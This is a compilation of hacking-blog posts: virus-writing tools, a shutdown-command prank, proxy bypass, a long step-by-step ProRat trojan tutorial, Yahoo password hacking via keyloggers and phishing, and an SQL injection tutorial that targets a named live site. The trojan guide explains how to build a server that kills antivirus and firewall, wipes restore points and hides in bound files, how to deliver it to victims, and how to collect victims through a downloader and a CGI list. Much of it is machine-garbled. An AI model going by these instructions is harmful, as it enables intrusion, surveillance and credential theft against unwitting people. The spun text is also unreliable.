It looks really impressive, doesn't it? Reading through the assembly source code of the STONED virus, which took me less than five minutes to find on the Internet, it looked *real* enough to me. But to someone who's not a full-time assembly language hacker, the code could have been spurious nonsense, designed to send wannabe virus writers down a blind alley. How am I going to find out whether this is real source code or not? The only way of being sure is to feed the assembly language code into an assembler and turn it into an executable binary of machine code. Once anyone has the binary, they can either compare it with a virus from the "wild" or run it and see if it infects their disks.

Virus Writing Tutorials

There are a lot of virus writing tutorials on the Internet, and anyone learning about viruses really wants to find a tutorial that deals with the platform they are coding for, as any example code can be used to get them started. Otherwise, tutorials in any other languages are good for giving a novice virus writer new ideas and concepts if they can follow them.

Some of the tutorials deal with basic concepts, such as the Over Writing virus, which reproduces itself by overwriting the first parts of a program with itself, and carries a destructive payload that kicks in the first time the program is run. Other tutorials deal in depth with stealth viruses which move to escape detection, armoured viruses which have been specifically designed to evade detection by some of the most popular anti-virus software, and polymorphic viruses that use self-encryption on each new generation to prevent their viral signature being detected.

Virus Creation Packages and Mutation Engines

All software writers use tools, and virus writers are no exception. The two most popular tools are "virus creation packages" and "polymorphic mutation engines". These tools are written by the active virus-writing community, and have only one purpose: to enable writers to code viruses quickly, easily and with advanced capabilities.

Polymorphic Mutation Engines

A polymorphic mutation engine is computer code that allows a virus writer to encrypt viruses to prevent them showing a viral signature. The most famous of these is the Mutation Engine written by the Bulgarian Dark Avenger, but virus writers could also run into TridenT Polymorphic Engine, Visible Mutation Engine and many others. Most of these packages are program modules that can be included in other programs to give them the ability to produce polymorphic viruses. By using these packages and including the code into viruses they are writing, novice writers can give even very simple viruses polymorphic capability, enabling them to escape detection.

Virus Creation Packages

Some virus writers have been clever enough to write "virus creation packages" which can generate virus code for users who can't write their own. One such, the sophisticated Virus Creation Lab, offers a full menu-driven virus creation kit, but others such as Virus Construction Set only offer the user a chance to create a pre-canned virus with their own message in it. Viruses that come from creation packages like these will rarely be as sophisticated as viruses written by hand, because virus writing is advancing so quickly that not all virus types can ever be included in a single package. The packages might be of some use to a novice virus writer who wishes to study the code produced, but real virus writers will still prefer to cut their code the old way, and see the creation package user as a script kiddy capable only of running software other smarter hackers have written.

Once again, any systems administrator should always keep an eye out for any of the tools used by Virus writers in case they should appear on the systems they administer. Systems administrators should be aware of activity going on their systems so that they can spot virus source code, tutorials or virus contruction tools before the novice virus writer has got very far. If a systems administrator finds any of these items on a their servers, then a little chat with the user owning those tools would be helpful in determining whether they were present due to natural curiosity or any malicious intent.




The Virus Community

Like every part of the computer community, the virus writers have their own community of mailing and discussion lists, web sites and BBSs. The virus writing community is more hidden and covert than most hacking communities because virus writers have more to lose than most hackers, so what anyone will find on the Internet is just the tip of the iceberg, with 90 per cent of virus writing buried deep underground for fear of exposure and prosecution.

Virus groups such as Phalken/Skism, Kefrens, Team Necrosis and phVX write tutorials and ezines, trade viruses, source code, tools, and make them all available on ftp and web sites for anyone with an interest in virus writing to download. Some of the ezines for the virus-writing community include 40hex magazine, Infected Voice, 29A, * magazine and Crypt Newsletter. If anyone wants to get accepted into the virus community, they must make sure they can code really well and then read the section in the next chapter about getting into the warez community, but trade viruses instead of warez. Hopefully by the time they've learnt to code well enough, they'll have become more interested in something more technically challenging and useful than writing viruses.

This is an interesting tutorial in which we will create a fake “virus” which can shutdown, restart and log off your pc(Can also write a message and specify the countdown time). This is actually a faster way to turn off your pc, ’cause it doesn’t require clicking START>TURNOFF button etc….And you can always do a little mischief by sending it to your friends ;)


1Create shortcut,(Right click on your desktop and go to new -> shortcut )
2)After this will appear window and that is where you type the code

There are few variants , this one will shutdown pc .
To log of computer type shutdown -l -t 300 -c “your message”
To restart computer type shutdown -r -t 300 -c ” your message”
The number after -t is the number of seconds countdown there will be before shutdown . After -c write own message , that will come up when shutdown box pops up.

3) Click Next, Finish

4) After this will appear icon on desktop, when someone click it, shutdown box will pops up.


Enter email address where you want to receive tutorials when we post them! It’s free!

3)How can I stop system shutdown ? Go to Start->Run , then open cmd,write shutdown -a and press ENTER on keyboard, as shown below

How To Get Into Blocked Websites In School

Let’s assume you’re at school and you’re on the computer. There’s an enormous chance that you have restriction. So you’re browsing and you go to facebook or youtube. And what happens?You can’t access some websites because they are blocked. Damn… What now…

This is really easy, just go to proxy site, type url and click Surf or Go . Proxy Sites do let you to connect to their server first before you reaching to the destination URLs.If you want to know more , Below is list of the proxy sites , which might work for you.

Pricacywanted.info

Netrover.info








maRATs :

RATs also called as Remote Administration tools are popularly used softwares to control other computer remotely plus considering hacking aspects, hack computer remotely. there’s lots of RATs such as:
Prorat
Turkojan
Yuri RAT plus lots of other.

Working of RATs:

To hack computer remotely using a RAT, you’ve to develop a server plus then send this server to victim whose you want to hack computer remotely. Generally, this server is binded to any file say picture or song, so that whenever victim opens this file on his computer, our server is installed plus this server opens port of victim computer plus by using this opened port, you are able to hack computer remotely.

it is this RAT server that then sends all scheme information to PRORAT plus they can then hack computer remotely using PRORAT.

Things you can do by hacking computer remotely:

five times you gain access to remote computer, you can hack computer remotely plus perform any of following:

Thus, you are able to hack computer remotely 100%. This program to hack computer remotely is hence popular.

Disadvantage of remote hacking program RAT:

The main disadvantage of this program – RAT is that the server created to hack computer remotely is recognized by most antiviruses as hacktool plus hence, antiviruses send alert messages when installing RAT server.
But, there’s lots of softwares like Binders or Crypters to hide RAT server plus prevent antiviruses from sending alerts. Even there’s softwares like AVkiller which is used to turn antivirus inactive plus then our server (used to hack computer remotely) can be installed on victim computer easily.

# Install a keylogger
# Monitor Chat windows
# Shutdown computer remotely
# Take control of scheme registry
# Hack locally stored passwords plus licence keys
# Download additional malware plus servers to gain stronger control
# Control plus access all Control Panel options(including add or remover programs)
# Send various Error messages
# Access Printer services
# Erase all disk data by formatting drives
# Open FTP connection plus start file transaction

This is all about RATs – softwares to hack computer remotely. In my next editorial, i will inform about server creation plus installation on remote computer

PRORAT – Remote computer access program:

1. Download PRORAT software for remote computer access. Password: techotips.blogspot.comAlternative download link for PRORAT program.password: netcrewpassword for prorat v1.9: pro (If netcrew doesn’t work).2. Unzip downloaded file using Winzix (download here) to use this remote computer access software3. Now, the unzipped file will contain Prorat.exe file. Run the file on your computer.4. Now, they have to develop a server to send it to remote computer for remote computer access. So, click on develop ->Create Prorat server.5. Go to no-ip.com plus register for an account.

6. Now, in Pro connective notification, enter in IP(DNS) address, the link provided to you by no-ip plus let all remaining fields remain unchecked.7. Alongwith using Pro connective notification, you can even use your mail address to confirm about server installation.8. You can even bind the server with a specific file to prevent victim knowing about the server installation on his computer.9. To change server default icon, click on “Server icon” on left option pane plus select any suitable icon according to binded file.10. Now, when all things are done, hit on “Create server” plus you will get server created in Prorat directory.

First thing’s first, you’ll charge a apple-pie archetype of Prorat V1.9 actuality is a articulation breadth you can get it from.

http://www.megaupload.com/?d=QNR1BZ3G

This book includes:

ProRat V1.9

The english advice file

Skin packs 1-5

The bark builder

pass: netcrew

Now you accept the all-important files, let’s alpha with the tutorial. Extract ProRat V1.9 and run the ProRat application. We’ll alpha with a ProRat server. Bang actualize abreast the basal and a baby ambience card will arise up, for now let’s aloof accomplish a ProRat server, we’ll awning the added types later.

The ProRat server is the server the rat communicates with, all the fun trojany things :P

The bureaucracy is appealing simple we’ll alpha with the notifications area.

Pro affiliation notification-

this is basically the SIN notification. Breadth it asks for you ip abode aloof bang on the little red half-circle on the ancillary and it will locate your alien ip abode for you.

Mail notification-

self explanitory, the server will accelerate you an email to acquaint you the victim has been infected.

ICQ pager-

If you use ICQ you can be notified of infections via that, put in your UIN and aback a victim is adulterated you will be abreast via ICQ

CGI-

This connects to a web cgi folio and uploads the advice aback a victim is infected

Choose whichever you like, I usually use email and SIN (Pro connective.)

Ok let’s move on to the accepted settings now.

Server Port-

the anchorage you run your server off of (default 5110) For the best allotment you don’t appetite to use the absence port

Server password-

Pick a countersign assure alone you accept access

Victim name-

nothing actual important, aloof so you can accelerate abstracted bodies abstracted servers and be able to analyze each, use whatever you appetite here

Give a affected absurdity message-

when the server is run it displays an absurdity message. You can adapt what it says by beat configure afterwards blockage the box.

Melt server-

After the server is installed the server installer is deleted if checked

Kill AV/Firewall-

when the server is run it kills the Anti-virus and Firewall processes to arrest apprehension if checked

Disable win Xp SP 2….. -

This kills the windows firewall aloft beheading if checked

Clear windows xp restore points-

This will annul all arrangement restore credibility to abstain acclimation the adulterated computer if checked

Don’t accelerate LAN notifications-

this disables notifications if addition aural your arrangement is infected, notifications still assignment from alfresco access aloof not on LAN if checked

Invisibility-

All three of these settings advice to adumbrate the server from the user. I’m not activity to explain them, I’ll aloof acquaint you to leave them all checked

Bind with file-

Allow you to accept a book to bind the server to (this helps anticipate detection)

Server extensions-

Pick the addendum blazon that you want

Server icon-

Pick an icon

So you’ve set all of your settings, now bang on actualize server in the basal appropriate bend and delay a few moments while the affairs builds the server. Go acquisition some suckas that will run it and accord them the file.

Now aback at the capital window of ProRat we’re activity to bang on the little check-box abutting to the R on the bar up top. This footfall is accidental if you didn’t use the pro affiliation notification. This listens for the SIN notifications

Put in the IP abode of your victim and the anchorage the server runs on and bang connect, you’ll be prompted for your password.

Now instead of walking you through this, this is the fun part, arena with your toys, I’ll acquaint you what not to try if you are accomplishing the testing on your own PC

CHAT-

Do not attack this unless you are able for a reboot or you are testing with a server on one computer and the applicant on another.

FUNNY STUFF-

Avoid abutting adviser because you won’t be able to see what you are doing.

Same with accessible screensaver

ok these ar the informations about the added server types

Downloader server-

(copy pasted from prorat, apologetic I’m absolutely tired)

Downloader server’s aim is to affect the victim in an accessible way. ProRat server is 350 kb but Downloader server is aloof alone 2kb. It is easier to accelerate to your victim.

Downloader server’s job is to download and run the absolute server on the ambition PC. It downloads the absolute server in a fast way and executes the book afterwards allurement any questions to your victim. Aback Downloader server is binded with a file, the files admeasurement won’t be too abundant big so your victim will not get apprehensive with the admeasurement of the file.

If you appetite to use Downloader server you charge accept a web hosting and you can additionally use a chargeless hosting. Afterwards this you charge actualize a accustomed server and put it into your web hosting area.

Lets say :

You accept a active a chargeless breadth from http://www.tripod.lycos.co.uk/signup/signup.phtml and you got a web hosting like this “http://members.lycos.co.uk/yourarea/” and upload your server that you created with ProRat applicant to this area.

After you uploaded you server your server abode will attending like “http://members.lycos.co.uk/yourarea/server.exe” Now the alone affair you charge do is actualize a Downloader server.

CREATING DOWNLOADER SERVER :

To actualize a Downloader server you charge bang on “‘Create” button first. A popup awning card will appear. Bang on “Create Downloader Server” Button and get into the Actualize Downloader server menu..

When you blazon the URL on the Downloader server card it will save it automatically so aback you appetite to analgesic addition Downloader server it will advice you for extenuative time.

You accept to chase this way:

1-URL :

In the Downloader server card you accept to blazon the URL for the download action that will be done on the ambition PC. For example: “http://members.lycos.co.uk/yourarea/server.exe”

2-Bind With a Book :

You can bind your server\downloader server with a book that you want. You charge bang on the “Bind the server with a file” button and afresh the book button will be activated. You can accept a book to be binded with the server now. The addendum is not so important you can see the admeasurement of binded server in the ”Server Size” part.

3-Server Addendum :

You can accept the addendum of Server\Downloader server that you will create. ProRat server supports 5 extensions. You can use these extensions for server: *.exe – *.scr – *.pif – *.com -*.bat

But 2 of them abutment icons. Added ones don’t supports windows figure service. *.exe and *.scr has got figure abutment so you can accept figure for this extensions.

4-Server Figure :

If you accept a addendum that has got an figure support. You can baddest the one you appetite to use with the server from the baby pictures on the menu, but don’t balloon icons will accomplish the server admeasurement a little bigger afresh the accustomed size.

If you appetite to use these icons bang on the ‘’server icon” area and baddest the ”Server icon” box. Accept one of them and your server will use this figure afterwards created.

If you accept done all the settings, you can actualize Downloader server. Now You alone accept to Bang on “Create Server” button.

After you accept created your Downloader server you can change its name. It will automatically download the absolute server and run it on the ambition PC with invisibility.

Downloader server will restart it cocky until it downloads the absolute server on ambition PC.

Warning: If the ambition PC gets broken while the Downloader server is downloading the absolute server from the web host, the downloading action will not resume from the aftermost allotment it will aloof alone restart to download the absolute server afresh and If you appetite a action like resuming the download from a 2kb affairs you wont behaving adequately adjoin PRO GROUP.

Create CGI victim List

(copy pasted already again)

What is a Victim List? :

Victim annual is a arrangement that will let you appearance the advice beatific from the server aloof like the email and icq notifications. The advice beatific to your CGI annual contains your victims IP address, Anchorage number, countersign etc… that gives you victims all capacity for connection.

Creating Victim Annual :

This is one of the better differences amid added Trojans CGI notifications. ProRat has got the best CGI victim annual architect on its own client. You can acclimatize aggregate you appetite aback you are creating your victim list. You don’t accept to apart time in configuring the victim annual codes like the added CGI victim lists, and you can accept which accent you appetite to use in CGI victim list.

If you appetite to actualize your victim annual you charge bang on the actualize button and a popup card will appear, bang on actualize CGI victim annual button and you will see 4 boxes and a actualize cgi files button. The appearance of the boxes are listed below: :

Victim Annual Countersign :

If you appetite your annual adequate with a countersign you charge address which countersign you appetite to use in the bare box.

CGI Calligraphy Name :

You can accept the calligraphy name that doesn’t accommodate Turkish characters. If you appetite to change the name of the cgi annual afterwards you created your CGI Victim annual will not work. You charge change the name aback you are creating the file. Absence name of your cgi book will be prorat.cgi and it will be the best band-aid for this problem.

CGI calligraphy Abstracts :

You can accept the calligraphy name that doesn’t accommodate Turkish characters. If you appetite to change the name of the dat addendum book afterwards you accept created it will not work. You charge change the name aback you are creating your file. Absence name for your calligraphy abstracts book is log.dat and it’s the best band-aid for this problem. This scripts will save the logs advancing from server.

Max Cardinal for Annual :

This card will let you appearance the cardinal of victims in your list. Absence cardinal is 100. You can accept every cardinal for this bare but if you accept a cardinal like 10000 charlatan will assignment slow.

After you bureaucracy these details. Bang on the “Create CGI files” button.

How To Use:

To use this CGI victim annual tool. You charge accept a host with CGI support. You can booty a chargeless host from these sites

http://www.netfirms.com

http://www.tripod.lycos.com

After you annals an annual from a host, you charge upload “prorat.cgi and “log.dat” to your hosts cgi-bin binder in ASCII mod. Change the CHMOD for “prorat.cgi” to 755, and change the CHMOD for “log.dat” to 600. If you don’t apperceive what is CHMOD amuse apprehend the afterward steps.

INSTALL + IMPORTANT THINGS + FREQUENTLY ASKED QUESTIONS:

1-Learn that your hosting supports CGI. If it doesn’t accept a CGI abutment use addition host with CGI support.

2-Upload your files to the cgi-bin binder on your host and don’t balloon to analysis them you should see 2 files in your CGI agenda afterwards you upload them.

3-You charge upload your files to your host in ASCII mod. If you upload in bifold mod your CGI victim annual won’t work. If you appetite to break this botheration we acclaim to you upload with Cute-Ftp program. Professional FTP programs like Cute-Ftp can automatically accept the mod for extensions of files. If you appetite added capacity chase upload + ASCII + cgi in http://www.google.com

4-Did you bureaucracy the files to CHMOD in you host ?

The amount of the Victim lists capital book that is “prorat.cgi” charge be 755 in CHMOD, and the ‘log.dat’ amount charge be 600 in CHMOD.

You can acclimatize CHMOD afterwards you upload files with Cute-Ftp. Appropriate bang on the book and bang on CHMOD and chase the accomplish :

prorat.cgi :

Owner permissions :

[X]READ [X]WRÄ°TE [X]EXECUTE

Group permissions :

[X]READ [ ]WRÄ°TE [X]EXECUTE

Public permisions :

[X]READ [ ]WRÄ°TE [X]EXECUTE

log.dat :

Owner permissions :

[X]READ [X]WRÄ°TE [ ]EXECUTE

Group permissions :

[ ]READ [ ]WRÄ°TE [ ]EXECUTE

Public permisions :

[ ]READ [ ]WRÄ°TE [ ]EXECUTE

5-If you say I did all the settings appropriate but my annual didn’t assignment :

Did any adapt your prorat.cgi book afterwards you created it? If you edited your prorat.cgi book your annual may not assignment and actualize a fresh CGI file.

6-If you say, I’m accounting my countersign into my CGI victim annual but my victim annual doesn’t accessible we anticipate that you accept afflicted the names of your CGI files afterwards you created them, and this may annual this problem.

Don’t balloon if you appetite to change names of files you charge name them aback you are creating the files from the client, But if you are an avant-garde user you can accessible “prorat.cgi” with a argument editor and adapt the settings as you appetite to do in “prorat.cgi”.

7-If you are accounting the actual URL for your victims annual but it says “****** called book cannot be found”.

If you accept a botheration like this maybe you forgot to upload “log.dat” book to cgi-bin binder in host or you afflicted name of the log.dat book afterwards you created it.

8-IF you forgot the countersign that you put to your victim list. Actualize a fresh one and change the fresh prorat.cgi with the earlier one and don’t balloon to agenda it somewhere.

9-If you accept abounding victims but they don’t get listed on your victim list. Accessible prorat.cgi with a argument editor and arise to settings allotment and $show_list = “xxx”; address a amount instead of xxx like absence cardinal for that is “100″ , afterwards you set it, upload and alter t with the old file. If you say I can’t do that actualize a fresh prorat.cgi from Applicant and blazon a bigger amount for the max cardinal of annual for archetype 200.

10-if you say I did all the things but I don’t apperceive how to affix to my victim list. Blazon http://yoursite/cgi-bin/prorat.cgi on your browser and you will see your login page. The important point of you CGI URL is the end of your URL be the name of you cgi book of prorat.cgi and blazon it to the end of your URL.

For archetype you accept a annual like http://prorat.netfirms.com and you didn’t accord the absence name for prorat.cgi and instead you acclimated the name counter.cgi. your URL should be like this http://prorat.netfims.com/cgi-bin/counter.cgi

11-if you say I took a host from tripod but it doesn’t accord me permission to adapt manually CHMOD. That is accurate some hosts don’t gives permission for this but we can break this botheration with afterward steps.

Login on tripod’s folio with your username and countersign and go to FÄ°LE MANAGER. Your files will be apparent in a appropriate calligraphy folio and go to cgi-bin folder, analysis the box abutting to the ProRat cgi book and bang on the button at the larboard top (EDIT). Now annul all the things in prorat.cgi and archetype the prorat.cgi that is in your PC to your host and save it.

12-If you say I did all the things but I can’t upload log.dat. Blazon article on log.dat and try to accelerate it again. Afterwards you install your victim annual you can annul logs with the button called ‘Empty Page’ button.

13-If you say that you took a chargeless host with cgi abutment but the hosting aggregation bankrupt my account.

If you accept abounding victims, this cartage can be alerted to the admin of aggregation or you alone use cgi-bin of your annual it can active them too. Now you can accessible a fresh annual and put a armpit with 2-3 pages, and put a basis and affix to your ex users change the earlier cgi annual articulation with online editor.

14-If you don’t actualize prorat.cgi with ProRat applicant and downloaded it from about or if you appetite to upload it afterwards a continued time, you can change it to bifold mod while you are alteration it or downloading it. Download ProRat Applicant and actualize your own Victim list.

15-If you say I approved aggregate and I did all the things appropriate but my annual didn’t work:

If your age is beneath 16;

We acclaim you to not use ProRat for a brace of years and instead application ProRat go and comedy amateur or use your computer for education.

You will require to have Winzix to get PRORAT – remote computer access program. Download Winzixhere.Now, when you’ve created PRORAT server, next step is to send this server to victim computer plus then use PRORAT for remote computer access. I will explain in my next editorial about how to connect to remote PRORAT server on remote victim computer plus then use this for remote computer access. If you’ve any problem in using this


lost door v 3.2 Stable (Build 2)
[Image] lost door v 3.2 Stable (Build 2) done at 21 May my birthday date (happy birthday to me :lol: )
Lost door Official Website www.lostdoor.cn download http://www.lostdoor.cn/download.html Whats New :
———–
# [+] Remote Nat viewer
# [+] Rmote Resotr Manager
# [+] Added Some Graphics
# [+] Some minor Bugs fixed
# [+] Some Forms Has Been Modified
# [+] News Navigator was Added
Pictures :
————————
[Image][Image] [Image]

Hits Page

web counter html code

License

Entertainment (Music) - TOP.ORGBest Indian websites rankingEntertainment Blogs - Blog RankingsBlogRankers.comsoftware Free Downloads
EntertainmentTop Entertainment blogsSoftware Blogs - Blog Catalog Blog DirectoryTop Blogs
Submit your website to 20 Search Engines - FREE with ineedhits!@Submit!-FREE PromotionSearch Engine Marketing & OptimizationSubmit Your Site To The Web's Top 50 Search Engines for Free!
Haroof Top SitesWebsite Promotion

Website Promotion

Language Translate

Visitors FlaGs

free counters

Live map

Pages

Powered by Blogger.

Live Traffic Feed

Categories

Followers

About Me

My photo
Come and lets get fucked bitches and m0r0nx ! wh0 try t0 cheated u ! this world is s0 selfish and careless =X u can easily fucked them by try t0 my hacking t00ls and s0ftwares =] i gifted t0 u these all things =] this w0rld d0es,nt care any0ne , s0 why u st0pped ? fuck all those wh0 try t0 cheat u, s0mething wr0nG u, anD dishearted t0 U ! Fucked them and feel free t0 life ! Enj0y =] prO X haCker's TeaM Private Contact = abzoz_killer981@hotmail.com

Unlock Yahoo when Account is Blockeds

| Friday, September 11, 2009 |

This is a very easy but an awesome Trick. When you or someone else enters an incorrect login multiple times then Yahoo! locks the account for “security reasons” and you are unable to access your chat names. Cool thing is that, these are a piece of cake to unlock.All you need is a list of Yahoo servers to log in with. Every time you login, you are using what’s called a server to access yahoo. You login with a cookie, which is sort of like an information packet or ID proving that you are who you claim to be, and the account is yours.When people attempt to log your name in multiple times with a locking tool, all they are doing is logging in over and over with an incorrect password until your cookie expires, which means you will no longer be allowed to login. So, when you find yourself locked, what you need to do is refresh your cookie. But how can you do that when the yahoo server you were using has blocked you?Simple, find another server. Yahoo has servers all over the place. There are more than I’d care to count. I’ll include a pretty decent sized list with this tutorials. All you have to do is paste one of these servers in your browser and log in on the page you see. Unless you have been locked on that server as well, you will receive a fresh cookie and will be able to log in to messenger again.Tons of people try to go through their email and login there to unlock an account, but a smart locker will shut down your mail server first, then cut off your chat server. Most people don’t know what to do if the email is blocked, so they give up trying. That’s why I don’t even bother with the email method. I simply pick another server, log in, and I’m good to go. There are so many servers out there that it is impossible to lock them all. Even if they could, the lock is only for about 12 hours, and then you’re back in business.Some Yahoo Servers :http://cn.mail.yahoo.com/?id=77070 CHINA
http://edit.india.yahoo.com/config/mail?.intl=in INDIA
http://edit.europe.yahoo.com/config/mail?.intl=uk EUROPE/UK
http://login.yahoo.com/config/mail?.intl=cf FRENCH CANADIAN
http://my.yahoo.co.jp/ JAPAN
http://login.yahoo.com/config/login USAYahoo Chat Logins :http://hk.chat.yahoo.com/?myHome HK
http://tw.chat.yahoo.com/?myHome Taiwan
http://in.chat.yahoo.com/?myHome India
http://chat.yahoo.co.jp/?myHome Japan
http://chat.yahoo.co.jp/?myHome Korea
http://sg.chat.yahoo.com/?myHome Singapore
http://chinese.chat.yahoo.com/?myHome Chinese
http://cn.chat.yahoo.com/?myHome China
http://asia.chat.yahoo.com/?myHome Asia
http://au.chat.yahoo.com/?myHome Australia & Nz
http://dk.chat.yahoo.com/ Denmark
http://fr.docs.yahoo.com/chat/chatbylycos.html France
http://de.docs.yahoo.com/chat/chatbylycos.html Germany
http://it.docs.yahoo.com/chat/chat.html Italy
http://no.chat.yahoo.com/ Norway
http://es.docs.yahoo.com/chat/chatbylycos.html Spain
http://se.chat.yahoo.com/ Sweden
http://uk.docs.yahoo.com/chat/chatbylycos.html Uk & Ireland
http://ar.chat.yahoo.com/?myHome Argentina
http://br.chat.yahoo.com/?myHome Brazil
http://espanol.chat.yahoo.com/?myHome South America
http://mx.chat.yahoo.com/?myHome Mexico
http://ca.chat.yahoo.com/?myHome Canada
http://world.yahoo.com/ World of yahooCheers and Keep learning.


Yahoo Hack Pack + Free Donwload EnjOy!

| |

This is a nice hack pack with very much yahoo hacks, i thing all the yahoo hacks in the world. My virus scan says HackTool, so no virusses. But you can run it with sandbox. Its a nice pack, download it :D. Enjoy!

Download here


How to Hack a Yahoo Password

| |

Everyday I get a lot of emails from people asking How to hack a Yahoo password? So if you’re curious to know how to hack a yahoo password then this is the post for you. In this post I will give you the real and working ways to hack Yahoo password.

There are number of sites on the web that provide information to hack a Yahoo password. So what’s special about this site? The only special about this site is that we do not bluff and mislead the readers. We actually teach you the real and working ways to hack a Yahoo password rather than telling some nonsense tricks to crack or hack some one’s yahoo password.

THINGS YOU SHOULD KNOW BEFORE PROCEEDING

With my experience of about 6 years in the field of Hacking and IT security, I can tell you that there are only TWO ways to hack a Yahoo password: They are Keylogging and Phishing. All the other ways are scams! Here is a list of facts that you need to know about hacking Yahoo password.

1. There is no ready made software or program that can hack a Yahoo password just by entering the target username. If you come accross a site that claims to sell a program to hack Yahoo password then it’s 100% scam.

2. Never trust any Hacking Service that claims to hack a Yahoo password just for $100 or $200. All the hacking services are scams.

The following are the only 2 foolproof methods to hack a Yahoo password.

1. EASIEST WAY TO HACK YAHOO PASSWORD

Using keylogger is the easiest way to hack a Yahoo password. Any one with a basic knowledge of computer can use a keylogger without any problems. It doesn’t matter whether or not you’ve physical access to the target computer. The following are some of the frequently asked questions about keyloggers.

1. What is a keylogger?

A keylogger is a small program that records each and every keystroke (including passwords) that a user types on a specific computer’s keyboard. A keylogger is also called as Spy program or Spy software.

2. Where can I get the keylogger?

There exists hundrends of keyloggers on the internet. But most of them are of poor quality and fail to deliver a good performance. The two best keyloggers for hacking yahoo password are listed below.

SniperSpy (Supports Remote Installation)

Win-Spy (Supports Remote Installation)

For more information on keyloggers, installation procedure and FAQs please refer my previous post: How to Hack an Email Account

3. Which keylogger is the best to hack Yahoo password?

Both the above mentioned ones are best for hacking Yahoo. However I recommend SniperSpy since it is more reliable and has got a better advantage over WinSpy. To get a complete review of SniperSpy please see my new post Which Spy Software to Choose

If you’re really serious to hack a Yahoo password then I strongly recommend using either of the two mentioned keyloggers.

For a complete installation guide and more information on these two softwares visit the following links

1. SniperSpy 2. WinSpy

2. OTHER WAYS TO HACK YAHOO PASSWORD

The other most commonly used trick to hack Yahoo password is using a Fake Login Page (also called as Phishing). Today, Fake login pages are the most widely used techniques to hack Yahoo password. A Fake Login page is a page that appears exactly as a Login page of sites like Yahoo, Gmail etc. But once we enter our password there, we end up loosing it.

Fake login pages are created by many hackers on their sites which appear exactly as Gmail or Yahoo login pages but the entered details(username & password) are redirected to remote server and we get redirected to some other page. Many times we ignore this but finally we loose our valuable data.

However creating a fake login page and taking it online to successfully hack a Yahoo password is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc. So if you are new to the concept of hacking passwords, then I recommend using the keyloggers to hack Yahoo. Because Keyloggers are the easiest way to hack Yahoo password.


HOW DOES WORMS WORK ?

| |

People use e-mail more than any other application on the internet, but it can be a frustrating experience, with spam and especially e-mail worms filling our inboxes.

Worms can spread rapidly over computer networks, the traffic they create bringing those networks to a crawl. And worms can cause other damage, such as allowing unauthorized access to a computer network, or deleting or copying files.

What's a worm?

A worm is a computer virus designed to copy itself, usually in large numbers, by using e-mail or other form of software to spread itself over an internal network or through the internet.


How do they spread?

When you receive a worm over e-mail, it will be in the form of an attachment, represented in most e-mail programs as a paper clip. The attachment could claim to be anything from a Microsoft Word document to a picture of tennis star Anna Kournikova (such a worm spread quickly in February 2001).

If you click on the attachment to open it, you'll activate the worm, but in some versions of Microsoft Outlook, you don't even have to click on the attachment to activate it if you have the program preview pane activated. Microsoft has released security patches that correct this problem, but not everyone keeps their computer up to date with the latest patches.

After it's activated, the worm will go searching for a new list of e-mail addresses to send itself to. It will go through files on your computer, such as your e-mail program's address book and web pages you've recently looked at, to find them.

Once it has its list it will send e-mails to all the addresses it found, including a copy of the worm as an attachment, and the cycle starts again. Some worms will use your e-mail program to spread themselves through e-mail, but many worms include a mail server within their code, so your e-mail program doesn't even have to be open for the worm to spread.

Other worms can use multiple methods of spreading. The MyDoom worm, which started spreading in January 2004, attempted to copy infected files into the folder used by Kazaa, a file-sharing program. The Nimda worm, from September 2001, was a hybrid that had four different ways of spreading.

What do they do?

Most of the damage that worms do is the result of the traffic they create when they're spreading. They clog e-mail servers and can bring other internet applications to a crawl.

But worms will also do other damage to computer systems if they aren't cleaned up right away. The damage they do, known as the payload, varies from one worm to the next.

The MyDoom worm was typical of recent worms. It opened a back door into the infected computer network that could allow unauthorized access to the system. It was also programmed to launch an attack against a specific website by sending thousands of requests to the site in an attempt to overwhelm it.

The target of the original version of MyDoom attack was the website of SCO Group Inc., a company that threatened to sue users of the Linux operating system, claiming that its authors used portions of SCO's proprietary code. A second version of MyDoom targeted the website of software giant Microsoft.

The SirCam worm, which spread during the summer of 2001, disguised itself by copying its code into a Microsoft Word or Excel document and using it as the attachment. That meant that potentially private or sensitive documents were being sent over the internet.

How do I get rid of them?

The best way to avoid the effects of worms is to be careful when reading e-mail. If you use Microsoft Outlook, get the most recent security updates from the Microsoft website and turn off the preview pane, just to be safe.

Never open attachments you aren't expecting to receive, even if they appear to be coming from a friend. Be especially cautious with attachments that end with .bat, .cmd, .exe, .pif, .scr, .vbs or .zip, or that have double endings. (The file attachment that spread the Anna Kournikova worm was AnnaKournikova.jpg.vbs.)

Also, install anti-virus software and keep it up to date with downloads from the software maker's website. The updates are usually automatic.

Users also need to be wary of e-mails claiming to have cures for e-mail worms and viruses. Many of them are hoaxes that instruct you to delete important system files, and some carry worms and viruses themselves.

As well, some users should consider using a computer with an operating system other than Windows, the target of most e-mail worms. Most of the worms don't affect computers that run Macintosh or Linux operating systems.


SQL Injection : Ultimate method for Website Hacking Tutorial Full Guide Vedio EnjOy!

| |








Welcome to my very first tutorial for SQL Injection on Genius hackers. SQL Injection basically means to execute a query in the database which is connected to the website to get personal information out of it, which is not visible to a normal user. Database is most likely to be a part of the websites, which saves all the information like user names, passwords, posts, replies in it. So there is a possibility that you might put some commands or queries or requests whatever you want to call it into the database to get some hidden information out of it.

It is noticed that in the past SQL Injection have been used several times to steal the credit card information, E-mail address and passwords, because most of the users have same E-mail address and passwords into all of their E-mail accounts. So if you manage to hack one of the accounts, you may just get access to all of their accounts. SQL Injection is most likely used by the “Penetration Testers” to check if the website of their clients are vulnerable to some kind of attacks to steal the information. Here, in this article I will show you how do they do it. There are some simple terms expected out of you and one of them is that you understand the basic knowledge of the computer. This tutorial will let you know, how to start? where to stop? what to do? and if you have any further queries you can post them here and i will help you to work with it.

PLEASE REMEMBER: Nishant Soni or Genius Hackers take no responsibility of whatsoever damaged is made by you by this knowledge. This is just for the educational purposes so you can secure your own website.

I will divide this tutorial into some points so it can help you in a better way to understand the structure of the SQL Database which is working at the backend of the website to store, save and execute the information.

I will use a LIVE website in this tutorial, so you can try to test it on your own and believe me it really helps to develop your skills.

The website that I will use today is www[dot]rfidupdate[dot]com.

To understand what is an SQL Database, the very simple thing i can explain to you is the “website where you can register, login or create your own profile. Because it will save the data you input into your profile and will execute / display them whenever you provide the correct username or the password. So in the same way the website i mentioned above will give you a chance to be a part of it, it will update you daily about respective news.

1. How to check if the website is vulnerable to SQL Injection?
A:
